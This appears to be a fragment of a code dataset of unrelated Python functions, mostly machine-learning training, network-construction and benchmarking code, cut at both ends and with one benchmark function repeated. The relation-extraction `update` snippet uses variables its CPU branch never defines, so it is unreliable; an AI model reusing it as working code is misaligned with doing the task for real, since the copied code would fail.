self.logger.info(\n \"Load dataset done\\nTraining: %d imgs, %d batchs\\nEval: %d imgs, %d batchs\",\n len(train_dataset),\n len(train_loader),\n len(val_dataset),\n len(self.val_loader)\n )\n iter_generator = make_iter_dataloader(train_loader)\n\n while self.iter < self.global_cfg[\"training\"][\"train_iters\"]:\n img, label = next(iter_generator)\n self.train_iter(img, label)\n\n def is_val():\n p1 = self.iter != 0\n p2 = (self.iter + 1) % self.global_cfg[\"training\"][\"val_interval\"] == 0\n p3 = self.iter == self.global_cfg[\"training\"][\"train_iters\"] - 1\n return (p1 and p2) or p3\n\n # have a validation\n if is_val():\n self.validate()\n # end one iteration\n self.iter += 1", "def update(self, batch):\n if self.opt['cuda']:\n inputs = [Variable(torch.LongTensor(b).cuda()) for b in batch[:3]]\n subj_start_binary = Variable(torch.LongTensor(batch[5]).cuda()).float()\n subj_end_binary = Variable(torch.LongTensor(batch[6]).cuda()).float()\n obj_start_relation = Variable(torch.LongTensor(batch[7]).cuda())\n obj_end_relation = Variable(torch.LongTensor(batch[8]).cuda())\n subj_start_type = Variable(torch.LongTensor(batch[9]).cuda())\n subj_end_type = Variable(torch.LongTensor(batch[10]).cuda())\n obj_start_type = Variable(torch.LongTensor(batch[11]).cuda())\n obj_end_type = Variable(torch.LongTensor(batch[12]).cuda())\n nearest_subj_start_position_for_each_token = Variable(torch.LongTensor(batch[13]).cuda())\n distance_to_nearest_subj_start = Variable(torch.LongTensor(batch[14]).cuda())\n distance_to_subj = Variable(torch.LongTensor(batch[15]).cuda())\n nearest_obj_start_position_for_each_token = Variable(torch.LongTensor(batch[3]).cuda())\n distance_to_nearest_obj_start = Variable(torch.LongTensor(batch[4]).cuda())\n else:\n inputs = [Variable(torch.LongTensor(b)) for b in batch[:4]]\n subj_start_label = Variable(torch.LongTensor(batch[4])).float()\n subj_end_label = Variable(torch.LongTensor(batch[5])).float()\n obj_start_label = Variable(torch.LongTensor(batch[6]))\n obj_end_label = Variable(torch.LongTensor(batch[7]))\n subj_type_start_label = 
Variable(torch.LongTensor(batch[8]))\n subj_type_end_label = Variable(torch.LongTensor(batch[9]))\n obj_type_start_label = Variable(torch.LongTensor(batch[10]))\n obj_type_end_label = Variable(torch.LongTensor(batch[11]))\n subj_nearest_start_for_each = Variable(torch.LongTensor(batch[12]))\n subj_distance_to_start = Variable(torch.LongTensor(batch[13]))\n \n \n mask = (inputs[0].data>0).float()\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n\n \n subj_start_logits, subj_end_logits, obj_start_logits, obj_end_logits = self.model(inputs, distance_to_subj)\n\n subj_start_loss = self.obj_criterion(subj_start_logits.view(-1, self.opt['num_subj_type']+1), subj_start_type.view(-1).squeeze()).view_as(mask)\n subj_start_loss = torch.sum(subj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n subj_end_loss = self.obj_criterion(subj_end_logits.view(-1, self.opt['num_subj_type']+1), subj_end_type.view(-1).squeeze()).view_as(mask)\n subj_end_loss = torch.sum(subj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_start_loss = self.obj_criterion(obj_start_logits.view(-1, self.opt['num_class']+1), obj_start_relation.view(-1).squeeze()).view_as(mask)\n obj_start_loss = torch.sum(obj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_end_loss = self.obj_criterion(obj_end_logits.view(-1, self.opt['num_class']+1), obj_end_relation.view(-1).squeeze()).view_as(mask)\n obj_end_loss = torch.sum(obj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n loss = self.opt['subj_loss_weight']*(subj_start_loss + subj_end_loss) + (obj_start_loss + obj_end_loss)\n \n # backward\n loss.backward()\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n loss_val = loss.data.item()\n return loss_val", "def gather_ps(rank, size, comm, k_allmodels, P21_allmodels, PHII_allmodels,\n first_snap_allmodels, last_snap_allmodels):\n\n def generate_tag(rank):\n tag = int(rank*100)\n\n return tag\n\n # Rank 0 will gather the wavenumber bins/power spectra from all other\n # ranks. \n if rank == 0:\n k_master = []\n P21_master = []\n PHII_master = []\n\n # Go through each model. \n for model_number in range(len(k_allmodels)):\n\n k_master.append([])\n P21_master.append([])\n PHII_master.append([])\n\n model_k = k_allmodels[model_number]\n model_P21 = P21_allmodels[model_number]\n model_PHII = PHII_allmodels[model_number]\n\n num_snaps = last_snap_allmodels[model_number] - \\\n first_snap_allmodels[model_number]\n rank_count = 0\n my_count = 0\n\n # Then go through each snapshot.\n # In the main data loop (``generate_data()``) the snapshots are\n # scatter sequentially. Hence when we gather, we get snap0 from\n # rank 0, snap1 from rank 1 etc. So we increase rank_count for each\n # snapshot and then reset it when we reach `size`.\n for snap_idx in range(num_snaps):\n\n if rank_count == 0:\n this_k = model_k[my_count] \n this_P21 = model_P21[my_count] \n this_PHII = model_PHII[my_count] \n my_count += 1\n else:\n # Each rank will use a unique tag.\n tag = generate_tag(rank_count) \n\n # Then the tag is offset for each data array. 
\n this_k = comm.recv(source = rank_count,\n tag = tag)\n this_P21 = comm.recv(source = rank_count,\n tag = tag+1)\n this_PHII = comm.recv(source = rank_count,\n tag = tag+2)\n\n # Now we have the data, append it to the master.\n k_master[model_number].append(this_k)\n P21_master[model_number].append(this_P21)\n PHII_master[model_number].append(this_PHII)\n\n rank_count += 1\n if rank_count == size:\n rank_count = 0\n\n # Snapshot Loop.\n # Model Loop.\n\n return k_master, P21_master, PHII_master\n\n else:\n\n # For all other ranks, go through the power spectra it calculated and\n # send it back to the root rank.\n for model_number in range(len(k_allmodels)):\n for idx in range(len(P21_allmodels[model_number])):\n\n tag = generate_tag(rank) \n\n k_this_idx = k_allmodels[model_number][idx]\n P21_this_idx = P21_allmodels[model_number][idx]\n PHII_this_idx = PHII_allmodels[model_number][idx]\n\n comm.send(k_this_idx, dest = 0, tag = tag)\n comm.send(P21_this_idx, dest = 0, tag = tag+1)\n comm.send(PHII_this_idx, dest = 0, tag = tag+2)\n\n # Non-zero ranks return junk.\n return None, None, None", "def __init__(self,\n num_class=2,\n layer_nums=(3, 5, 5),\n layer_strides=(2, 2, 2),\n num_filters=(128, 128, 256),\n upsample_strides=(1, 2, 4),\n num_upsample_filters=(256, 256, 256),\n num_input_features=128,\n num_anchor_per_loc=2,\n use_groupnorm=False,\n num_groups=32,\n box_code_size=7,\n num_direction_bins=2):\n super(RPN, self).__init__()\n self._num_anchor_per_loc = num_anchor_per_loc\n self._box_code_size=box_code_size\n self._num_class=num_class\n self._num_direction_bins=num_direction_bins\n assert len(layer_nums) == 3\n assert len(layer_strides) == len(layer_nums)\n assert len(num_filters) == len(layer_nums)\n assert len(upsample_strides) == len(layer_nums)\n assert len(num_upsample_filters) == len(layer_nums)\n upsample_strides=[int(i) for i in upsample_strides]\n\n factors = []\n for i in range(len(layer_nums)):\n assert int(np.prod(\n layer_strides[:i + 1])) % upsample_strides[i] == 0\n factors.append(\n np.prod(layer_strides[:i + 1]) // upsample_strides[i])\n assert all([x == factors[0] for x in factors])\n\n # note that when stride > 1, conv2d with same padding isn't\n # equal to pad-conv2d. 
we should use pad-conv2d.\n block2_input_filters = num_filters[0]\n if use_groupnorm:\n BatchNorm2d = change_default_args(\n num_groups=num_groups, eps=1e-3)(GroupNorm)\n else:\n BatchNorm2d = change_default_args(\n eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n\n self.block1 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_input_features, num_filters[0], 3,\n stride=layer_strides[0],bias=False),\n BatchNorm2d(num_filters[0]),\n nn.ReLU(),)\n for i in range(layer_nums[0]):\n self.block1.add(\n nn.Conv2d(num_filters[0], num_filters[0], 3,padding=1,bias=False))\n self.block1.add(BatchNorm2d(num_filters[0]))\n self.block1.add(nn.ReLU())\n self.deconv1 = Sequential(\n nn.ConvTranspose2d(num_filters[0],num_upsample_filters[0],\n upsample_strides[0],stride=upsample_strides[0],bias=False),\n BatchNorm2d(num_upsample_filters[0]),\n nn.ReLU(),)\n self.block2 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(block2_input_filters,num_filters[1],3,\n stride=layer_strides[1],bias=False),\n BatchNorm2d(num_filters[1]),\n nn.ReLU(),)\n for i in range(layer_nums[1]):\n self.block2.add(\n nn.Conv2d(num_filters[1], num_filters[1], 3, padding=1,bias=False))\n self.block2.add(BatchNorm2d(num_filters[1]))\n self.block2.add(nn.ReLU())\n self.deconv2 = Sequential(\n nn.ConvTranspose2d(num_filters[1],num_upsample_filters[1],\n upsample_strides[1],stride=upsample_strides[1],bias=False),\n BatchNorm2d(num_upsample_filters[1]),\n nn.ReLU(),)\n self.block3 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_filters[1], num_filters[2], 3, stride=layer_strides[2],bias=False),\n BatchNorm2d(num_filters[2]),\n nn.ReLU(),)\n for i in range(layer_nums[2]):\n self.block3.add(nn.Conv2d(num_filters[2], num_filters[2], 3, padding=1,bias=False))\n self.block3.add(BatchNorm2d(num_filters[2]))\n self.block3.add(nn.ReLU())\n self.deconv3 = Sequential(\n nn.ConvTranspose2d(\n num_filters[2],num_upsample_filters[2],\n upsample_strides[2],stride=upsample_strides[2],bias=False),\n BatchNorm2d(num_upsample_filters[2]),\n nn.ReLU(),)\n\n num_cls = num_anchor_per_loc * num_class\n self.conv_cls = nn.Conv2d(sum(num_upsample_filters), num_cls, 1)\n self.conv_box = nn.Conv2d(sum(num_upsample_filters), num_anchor_per_loc * box_code_size, 1)\n self.conv_dir_cls = nn.Conv2d(sum(num_upsample_filters),num_anchor_per_loc * num_direction_bins, 1)", "def compute_BP(self, betas, bias, type, idx_to_keep = None):\n\n if idx_to_keep is not None:\n betas[self._all_but(len(betas),idx_to_keep)] = 0.\n\n if type == 'rates':\n y1 = self.responses_all[:,self.stimuli == -1]\n y2 = self.responses_all[:,self.stimuli == +1]\n if type == 'regressors':\n y1 = self.regressors[:,self.stimuli == -1]\n y2 = self.regressors[:,self.stimuli == +1]\n if type == 'shuffled':\n y_sh = self._shuffle_regressors()\n y1 = y_sh[:,self.stimuli == -1]\n y2 = y_sh[:,self.stimuli == +1]\n\n x1 = np.dot(betas, y1) + bias\n x2 = np.dot(betas, y2) + bias\n p_c_1 = 1 - expit(x1) # = p(c=-1|s=-1,x)\n p_c_2 = expit(x2)\n BP = np.sum(p_c_1) + np.sum(p_c_2)\n BP = BP/float(self.ntrials)\n return BP", "def run_simple_CNN():\n [train_set, test_set, train_sampler, val_sampler, test_sampler] = pre_processing_and_samples()\n CNN = SimpleCNN()\n # Using GPU for training\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n if torch.cuda.is_available():\n print(\"cuda is available\")\n CNN.to(device)\n\n # Multiple GPUs\n if torch.cuda.device_count() > 1:\n CNN = nn.DataParallel(CNN)\n\n num_epochs = 100\n\n train_loss_hist, train_acc_hist, val_loss_hist, val_acc_hist 
= \\\n trainCNN(net=CNN, device=device, batch_size=64, n_epochs=num_epochs, learning_rate=0.001,\n train_set=train_set, test_set=test_set, train_sampler=train_sampler, val_sampler=val_sampler)\n test(net=CNN, device=device, test_set=test_set, test_sampler=test_sampler)\n\n fig, (ax1, ax2) = plt.subplots(2)\n\n ax1.set_title(\"Loss vs. Number of Training Epochs\")\n ax1.set(xlabel=\"Training Epoch\", ylabel=\"Loss\")\n ax1.plot(range(1, len(train_loss_hist) + 1), train_loss_hist, label=\"Training\")\n ax1.plot(range(1, len(val_loss_hist) + 1), val_loss_hist, label=\"Validation\")\n print(np.concatenate((train_loss_hist, val_loss_hist)))\n print(np.amax(np.concatenate((train_loss_hist, val_loss_hist))))\n ax1.set_ylim(\n (0, 1.25 * np.amax(np.concatenate((train_loss_hist, val_loss_hist), axis=0, out=None)).detach().cpu()))\n ax1.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax1.legend()\n\n ax2.set_title(\"Accuracy vs. Number of Training Epochs\")\n ax2.set(xlabel=\"Training Epoch\", ylabel=\"Accuracy\")\n ax2.plot(range(1, num_epochs + 1), train_acc_hist, label=\"Training\")\n ax2.plot(range(1, num_epochs + 1), val_acc_hist, label=\"Validation\")\n ax2.set_ylim(0, 100) # Sets y bounds\n ax2.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax2.legend()\n\n plt.tight_layout() # Call after plotting all subplots\n plt.savefig('basic_cifar_10.png')", "def u_net_bn(x, is_train=False, reuse=False, pad='SAME', n_out=3):\n _, nx, ny, nz = x.shape\n print(\" * Input: size of image: (%d %d %d)\" % (nx, ny, nz))\n w_init = tf.truncated_normal_initializer(stddev=0.01)\n b_init = tf.constant_initializer(value=0.0)\n decay = 0.9\n gamma_init=tf.random_normal_initializer(1., 0.02)\n lrelu = lambda x: tf.nn.leaky_relu(x, 0.2)\n with tf.variable_scope(\"u_net_bn\", reuse=reuse):\n inputs = InputLayer(x, name='in')\n\n conv1 = Conv2d(inputs, 64, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=b_init, name='conv1')\n conv2 = Conv2d(conv1, 128, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv2')\n conv2 = BatchNormLayer(conv2, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn2')\n\n conv3 = Conv2d(conv2, 256, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv3')\n conv3 = BatchNormLayer(conv3, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn3')\n\n conv4 = Conv2d(conv3, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv4')\n conv4 = BatchNormLayer(conv4, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn4')\n\n conv5 = Conv2d(conv4, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv5')\n conv5 = BatchNormLayer(conv5, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn5')\n\n conv6 = Conv2d(conv5, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv6')\n conv6 = BatchNormLayer(conv6, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn6')\n\n conv7 = Conv2d(conv6, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv7')\n conv7 = BatchNormLayer(conv7, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn7')\n\n conv8 = Conv2d(conv7, 512, (4, 4), (2, 2), act=lrelu, padding=pad, W_init=w_init, b_init=b_init, name='conv8')\n print(\" * After conv: %s\" % conv8.outputs)\n\n up7 = DeConv2d(conv8, 512, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, 
name='deconv7')\n up7 = BatchNormLayer(up7, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn7')\n\n # print(up6.outputs)\n up6 = ConcatLayer([up7, conv7], concat_dim=3, name='concat6')\n up6 = DeConv2d(up6, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv6')\n up6 = BatchNormLayer(up6, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn6')\n # print(up6.outputs)\n\n up5 = ConcatLayer([up6, conv6], concat_dim=3, name='concat5')\n up5 = DeConv2d(up5, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv5')\n up5 = BatchNormLayer(up5, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn5')\n # print(up5.outputs)\n\n up4 = ConcatLayer([up5, conv5] ,concat_dim=3, name='concat4')\n up4 = DeConv2d(up4, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv4')\n up4 = BatchNormLayer(up4, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn4')\n\n up3 = ConcatLayer([up4, conv4] ,concat_dim=3, name='concat3')\n up3 = DeConv2d(up3, 256, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv3')\n up3 = BatchNormLayer(up3, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn3')\n\n up2 = ConcatLayer([up3, conv3] ,concat_dim=3, name='concat2')\n up2 = DeConv2d(up2, 128, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv2')\n up2 = BatchNormLayer(up2, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn2')\n\n up1 = ConcatLayer([up2, conv2] ,concat_dim=3, name='concat1')\n up1 = DeConv2d(up1, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv1')\n up1 = BatchNormLayer(up1, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn1')\n\n up0 = ConcatLayer([up1, conv1] ,concat_dim=3, name='concat0')\n up0 = DeConv2d(up0, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv0')\n up0 = BatchNormLayer(up0, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn0')\n # print(up0.outputs)\n\n out = Conv2d(up0, n_out, (1, 1), act=tf.nn.sigmoid, name='out')\n\n print(\" * Output: %s\" % out.outputs)\n\n return out", "def speed():\r\n\r\n algo = ['logistic_sgd', 'logistic_cg', 'mlp', 'convolutional_mlp',\r\n 'dA', 'SdA', 'DBN', 'rbm', 'rnnrbm']\r\n to_exec = [True] * len(algo)\r\n# to_exec = [False] * len(algo)\r\n# to_exec[-1] = True\r\n do_float64 = True\r\n do_float32 = True\r\n do_gpu = True\r\n\r\n algo_executed = [s for idx, s in enumerate(algo) if to_exec[idx]]\r\n #Timming expected are from the buildbot that have an i7-920 @\r\n # 2.67GHz with hyperthread enabled for the cpu, 12G of ram. An GeForce GTX\r\n # 285 for the GPU. OS=Fedora 14, gcc=4.5.1, python/BLAS from EPD\r\n # 7.1-2 (python 2.7.2, mkl unknow). BLAS with only 1 thread.\r\n\r\n expected_times_64 = numpy.asarray([10.0, 22.5, 76.1, 73.7, 116.4,\r\n 346.9, 381.9, 558.1, 186.3])\r\n expected_times_32 = numpy.asarray([11.6, 29.6, 42.5, 66.5, 71,\r\n 191.2, 226.8, 432.8, 176.2])\r\n\r\n # Number with just 1 decimal are new value that are faster with\r\n # the Theano version 0.5rc2 Other number are older. 
They are not\r\n # updated, as we where faster in the past!\r\n # TODO: find why and fix this!\r\n\r\n# Here is the value for the buildbot on February 3th 2012.\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n# gpu times[3.72957802, 9.94316864, 29.1772666, 9.13857198, 25.91144657,\r\n# 18.30802011, 53.38651466, 285.41386175]\r\n# expected [3.076634879, 7.555234910, 18.99226785, 9.58915591, 24.130070450,\r\n# 24.77524018, 92.66246653, 322.340329170]\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n#expected/get [0.82492841, 0.75984178, 0.65092691, 1.04930573, 0.93125138\r\n# 1.35324519 1.7356905 1.12937868]\r\n expected_times_gpu = numpy.asarray([3.07663488, 7.55523491, 18.99226785,\r\n 9.6, 24.13007045,\r\n 20.4, 56, 302.6, 315.4])\r\n expected_times_64 = [s for idx, s in enumerate(expected_times_64)\r\n if to_exec[idx]]\r\n expected_times_32 = [s for idx, s in enumerate(expected_times_32)\r\n if to_exec[idx]]\r\n expected_times_gpu = [s for idx, s in enumerate(expected_times_gpu)\r\n if to_exec[idx]]\r\n\r\n def time_test(m, l, idx, f, **kwargs):\r\n if not to_exec[idx]:\r\n return\r\n print algo[idx]\r\n ts = m.call_time\r\n try:\r\n f(**kwargs)\r\n except Exception, e:\r\n print >> sys.stderr, 'test', algo[idx], 'FAILED', e\r\n l.append(numpy.nan)\r\n return\r\n te = m.call_time\r\n l.append(te - ts)\r\n\r\n def do_tests():\r\n m = theano.compile.mode.get_default_mode()\r\n l = []\r\n time_test(m, l, 0, logistic_sgd.sgd_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 1, logistic_cg.cg_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 2, mlp.test_mlp, n_epochs=5)\r\n time_test(m, l, 3, convolutional_mlp.evaluate_lenet5, n_epochs=5,\r\n nkerns=[5, 5])\r\n time_test(m, l, 4, dA.test_dA, training_epochs=2,\r\n output_folder='tmp_dA_plots')\r\n time_test(m, l, 5, SdA.test_SdA, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 6, DBN.test_DBN, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 7, rbm.test_rbm, training_epochs=1, batch_size=300,\r\n n_chains=1, n_samples=1, output_folder='tmp_rbm_plots')\r\n time_test(m, l, 8, rnnrbm.test_rnnrbm, num_epochs=1)\r\n return numpy.asarray(l)\r\n\r\n #test in float64 in FAST_RUN mode on the cpu\r\n import theano\r\n if do_float64:\r\n theano.config.floatX = 'float64'\r\n theano.config.mode = 'FAST_RUN'\r\n float64_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n\r\n #test in float32 in FAST_RUN mode on the cpu\r\n theano.config.floatX = 'float32'\r\n if do_float32:\r\n float32_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> 
sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n\r\n #test in float32 in FAST_RUN mode on the gpu\r\n import theano.sandbox.cuda\r\n if do_gpu:\r\n theano.sandbox.cuda.use('gpu')\r\n gpu_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n\r\n if (do_float64 + do_float32 + do_gpu) > 1:\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n if do_float64:\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n if do_float32:\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n if do_gpu:\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64 and do_float32:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n if do_float64 and do_gpu:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n print >> sys.stderr, 'expected float64/gpu', (\r\n expected_times_64 / gpu_times)\r\n if do_float32 and do_gpu:\r\n print >> sys.stderr, 'float32/gpu', float32_times / gpu_times\r\n print >> sys.stderr, 'expected float32/gpu', (\r\n expected_times_32 / gpu_times)\r\n\r\n def compare(x, y):\r\n ratio = x / y\r\n # If there is more then 5% difference between the expected\r\n # time and the real time, we consider this an error.\r\n return sum((ratio < 0.95) + (ratio > 1.05))\r\n\r\n if do_float64:\r\n err = compare(expected_times_64, float64_times)\r\n print >> sys.stderr, 'speed_failure_float64=' + str(err)\r\n if do_float32:\r\n err = compare(expected_times_32, float32_times)\r\n print >> sys.stderr, 'speed_failure_float32=' + str(err)\r\n if do_gpu:\r\n err = compare(expected_times_gpu, gpu_times)\r\n print >> sys.stderr, 'speed_failure_gpu=' + str(err)\r\n\r\n assert not numpy.isnan(gpu_times).any()", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(num_gpus=1)\n self._run_benchmark(params)", "def run_bootstrap_net_correlation_worker(run_parameters, spreadsheet_df, phenotype_df, network_mat,\n spreadsheet_genes_as_input, baseline_array, job_id):\n\n np.random.seed(job_id)\n\n restart_accumulator = np.zeros(network_mat.shape[0])\n gm_accumulator = np.ones(network_mat.shape[0])\n borda_count = np.zeros(network_mat.shape[0])\n\n phenotype_df = phenotype_df.iloc[[job_id], :]\n spreadsheet_df_trimmed, phenotype_df_trimmed, ret_msg = datacln.check_input_value_for_gene_prioritazion(\n spreadsheet_df, phenotype_df)\n\n 
sample_smooth = spreadsheet_df_trimmed.as_matrix()\n\n pearson_array = get_correlation(sample_smooth, phenotype_df_trimmed.values[0], run_parameters)\n n_bootstraps = run_parameters[\"number_of_bootstraps\"]\n for bootstrap_number in range(0, n_bootstraps):\n sample_random, sample_permutation = sample_a_matrix_pearson(\n sample_smooth, 1.0, run_parameters[\"cols_sampling_fraction\"])\n\n phenotype_response = phenotype_df_trimmed.values[0, None]\n phenotype_response = phenotype_response[0, sample_permutation]\n pc_array = get_correlation(sample_random, phenotype_response, run_parameters)\n\n pc_array[~np.in1d(spreadsheet_df_trimmed.index, spreadsheet_genes_as_input)] = 0.0\n pc_array = np.abs(trim_to_top_beta(pc_array, run_parameters[\"top_beta_of_sort\"]))\n restart_accumulator[pc_array != 0] += 1.0\n\n pc_array = pc_array / max(sum(pc_array), EPSILON_0)\n pc_array = kn.smooth_matrix_with_rwr(pc_array, network_mat, run_parameters)[0]\n pc_array = pc_array - baseline_array\n\n borda_count = sum_array_ranking_to_borda_count(borda_count, pc_array)\n gm_accumulator = (np.abs(pc_array) + EPSILON_0) * gm_accumulator\n\n restart_accumulator = restart_accumulator / n_bootstraps\n borda_count = borda_count / n_bootstraps\n # pcc_gm_array = gm_accumulator ** (1 / n_bootstraps)\n viz_score = (borda_count - min(borda_count)) / (max(borda_count) - min(borda_count))\n\n phenotype_name = phenotype_df_trimmed.index.values[0]\n gene_name_list = spreadsheet_df_trimmed.index\n gene_orig_list = spreadsheet_genes_as_input\n quantitative_score = borda_count\n generate_net_correlation_output(pearson_array, quantitative_score, viz_score, restart_accumulator,\n phenotype_name, gene_name_list, gene_orig_list, run_parameters)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def weight_update_rmsprop(self, network):\n epsilon = 10e-8\n gamma = self.gamma\n one_m_gamma = 1.0 - gamma\n\n if self.ms_b is None or self.ms_q is None:\n self.ms_b = []\n self.ms_q = []\n self.ms_rx_inp = []\n self.ms_ry_inp = []\n self.ms_rx_pos_out = []\n self.ms_ry_pos_out = []\n self.ms_rx_neg_out = []\n self.ms_ry_neg_out = []\n for l, layer in enumerate(network.layers):\n self.ms_b.append(np.zeros(layer.b.shape))\n self.ms_q.append(np.zeros(layer.q.shape))\n self.ms_rx_inp.append(np.zeros(layer.input_size))\n self.ms_ry_inp.append(np.zeros(layer.input_size))\n self.ms_rx_pos_out.append(np.zeros(layer.output_size))\n self.ms_ry_pos_out.append(np.zeros(layer.output_size))\n self.ms_rx_neg_out.append(np.zeros(layer.output_size))\n self.ms_ry_neg_out.append(np.zeros(layer.output_size))\n\n for l, layer in enumerate(network.layers):\n self.ms_b[l] = gamma * self.ms_b[l] + one_m_gamma * self.dc_db[l]**2\n self.ms_q[l] = gamma * self.ms_q[l] + one_m_gamma * self.dc_dq[l]**2\n\n self.ms_rx_inp[l] = gamma * self.ms_rx_inp[l] + one_m_gamma * self.dc_drx_inp[l]**2\n self.ms_ry_inp[l] = gamma * self.ms_ry_inp[l] + one_m_gamma * self.dc_dry_inp[l]**2\n\n self.ms_rx_pos_out[l] = gamma * self.ms_rx_pos_out[l] + one_m_gamma * self.dc_drx_pos_out[l]**2\n self.ms_ry_pos_out[l] = gamma * 
